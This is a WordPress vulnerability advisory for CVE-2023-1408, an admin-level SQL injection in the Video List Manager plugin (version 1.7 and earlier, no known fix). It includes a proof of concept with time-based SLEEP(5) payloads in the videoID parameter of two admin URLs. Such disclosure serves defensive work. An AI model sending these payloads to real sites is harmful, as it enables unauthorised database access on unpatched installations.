WordPress Plugin Vulnerabilities

Video List Manager <= 1.7 - Admin+ SQL Injection

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

SELECT query:

1. Log in as admin.
2. Visit the following path on the site: `/wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP%285%29`
3. The browser will take 5 seconds to respond.

DELETE query:

1. Log in as admin.
2. Visit the following path on the site: `/wp-admin/admin.php?page=tnt_video_del_page&videoID=SLEEP%285%29`
3. Click the "Yes" button.
4. The browser will take 5 seconds to respond.

Affects Plugins

Plugin icon
video-list-manager
No known fix

References

CVE
CVE-2023-1408

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
zhangyunpei and Yeting Li VARAS@IIE
Submitter
zhangyunpei
Verified
Yes
WPVDB ID
baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b

Timeline

Publicly Published
2023-04-17 (about 7 months ago)
Added
2023-04-17 (about 7 months ago)
Last Updated
2023-04-17 (about 7 months ago)

Other

Published
Title
Published
2020-11-25
Title
WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection
Published
2022-04-19
Title
Visual Slide Box Builder <= 3.2.9 - Subscriber+ SQLi
Published
2017-01-26
Title
WordPress 3.5-4.7.1 - WP_Query SQL Injection
Published
2023-05-30
Title
Groundhogg < 2.7.11.1 - Admin+ SQLi
Published
2014-08-01
Title
Donation <= 1.0 - SQL Injection